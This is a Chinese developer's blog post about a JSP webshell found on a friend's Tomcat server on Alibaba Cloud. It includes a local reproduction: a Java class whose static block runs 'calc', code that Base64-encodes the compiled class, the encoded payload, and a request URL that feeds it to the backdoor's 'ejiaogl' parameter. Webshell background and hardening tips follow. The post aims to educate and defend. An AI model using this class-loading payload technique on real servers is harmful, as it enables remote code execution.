一次被木马攻击的记录 java安全

描述最近一个老同学跟我说他部署在阿里云上的系统，在tomcat的目录下出现了一个index.jsp文件，内容大致如下：

文章图片

我一看发现这不就是一个木马后门文件吗，只需要通过参数ejiaogl传入一个经过base64编码的Class文件，这样就可以解码然后被类加载器加载，而我们知道类被加载的时候是可以执行static代码块的，而这个代码块可以任由攻击者来指定要执行的代码，是非常危险的，为了更加形象我特意做了一个模拟攻击。
模拟攻击准备木马文件
准备一个Tomcat，直接启动即可，默认访问的是ROOT目录下的index.jsp，准备好以上的木马后门文件直接替换，文件如下：

Hello World!

准备命令类
这里准备一个简单的命令类，打印日志，同时调用本地的计算器：

import java.io.IOException; public class Script { ? static { //非法操作 System.out.println("==Illegal operation=="); try { //打开计算器 Runtime.getRuntime().exec("calc"); } catch (IOException e) { } } }

Base64字符串
需要读取Class文件，然后转换成一个Base64编码的字符串：

private static byte[] loadBytes(Class cls) throws IOException { String name = cls.getCanonicalName().replaceAll("\.", "/") + ".class"; InputStream is = ClassLoader.getSystemResourceAsStream(name); BufferedInputStream bis = new BufferedInputStream(is); try { int length = is.available(); byte[] bs = new byte[length]; bis.read(bs); return bs; } finally { bis.close(); is.close(); } } ? // 编码操作 byte[] b = loadBytes(Script.class); String base64str = Base64.getEncoder().encodeToString(b);

以上生成的base64字符串如下所示：

yv66vgAAADQALgcAAgEABlNjcmlwdAcABAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAAygpVgEABENvZGUJAAkACwcACgEAEGphdmEvbGFuZy9TeXN0ZW0MAAwADQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwgADwEAFT09SWxsZWdhbCBvcGVyYXRpb249PQoAEQATBwASAQATamF2YS9pby9QcmludFN0cmVhbQwAFAAVAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgoAFwAZBwAYAQARamF2YS9sYW5nL1J1bnRpbWUMABoAGwEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsIAB0BAARjYWxjCgAXAB8MACAAIQEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsHACMBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQANU3RhY2tNYXBUYWJsZQEABjxpbml0PgoAAwApDAAnAAYBAAR0aGlzAQAITFNjcmlwdDsBAApTb3VyY2VGaWxlAQALU2NyaXB0LmphdmEAIQABAAMAAAAAAAIACAAFAAYAAQAHAAAAVwACAAEAAAAWsgAIEg62ABC4ABYSHLYAHlenAARLsQABAAgAEQAUACIAAwAkAAAAEgAEAAAABgAIAAgAEQAJABUACwAlAAAAAgAAACYAAAAHAAJUBwAiAAABACcABgABAAcAAAAvAAEAAQAAAAUqtwAosQAAAAIAJAAAAAYAAQAAAAMAJQAAAAwAAQAAAAUAKgArAAAAAQAsAAAAAgAt

发送请求
在浏览器中访问如下地址：

http://localhost:8080/index.jsp?ejiaogl=以上base64字符串

可以发现会生成相应的日志，同时会调用服务器端上的计算器，简单模拟了一次攻击；
Webshell 告警
当然阿里云是给出告警的，告警内容如下所示：

文章图片

【一次被木马攻击的记录】其中提到了index.jsp是一个木马文件，同时指定了木马类型为Webshell；
简介

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境，主要用于网站管理、服务器管理、权限管理等操作。使用方法简单，只需上传一个代码文件，通过网址访问，便可进行很多日常操作，极大地方便了使用者对网站和服务器的管理。正因如此，也有小部分人将代码修改后当作后门程序使用，以达到控制网站服务器的目的。

一方面，webshell被站长常常用于网站管理、服务器管理等等，根据FSO权限的不同，作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等；另一方面，被入侵者利用，从而达到控制网站服务器的目的。这些网页脚本常称为WEB脚本木马，比较流行的asp或php木马，也有基于.NET的脚本木马与JSP脚本木马。国内常用的WebShell有海阳ASP木马，Phpspy，c99shell等。
安全防范

建议用户通过ftp来上传、维护网页，尽量不安装asp的上传程序。
对asp上传程序的调用一定要进行身份认证，并只允许信任的人使用上传程序。
asp程序管理员的用户名和密码要有一定复杂性，不能过于简单，还要注意定期更换。
到正规网站下载程序，下载后要对数据库名称和存放路径进行修改，数据库名称要有一定复杂性。
要尽量保持程序是最新版本。
不要在网页上加注后台管理程序登陆页面的链接。
为防止程序有未知漏洞，可以在维护后删除后台管理程序的登陆页面，下次维护时再通过上传即可。
要时常备份数据库等重要文件。
日常要多维护，并注意空间中是否有来历不明的asp文件。
尽量关闭网站搜索功能，利用外部搜索工具，以防爆出数据。
利用白名单上传文件，不在白名单内的一律禁止上传，上传目录权限遵循最小权限原则。

参考
https://baike.baidu.com/item/...
https://www.freebuf.com/artic...
总结对于一个网站来说安全性其实是最重要的，但是对很多程序员来说往往会忽视这个问题，因为很多公司都有专门的安全部门，很多安全问题其实并不会流转到程序员手中；但我觉得我们程序员群体还是很有必要去了解一些安全方面的知识，一方面是保证了我们系统的安全性，另一方面其实也让我们对一些知识点理解的更加透彻，往往给你一种“还可以这么玩”的感觉。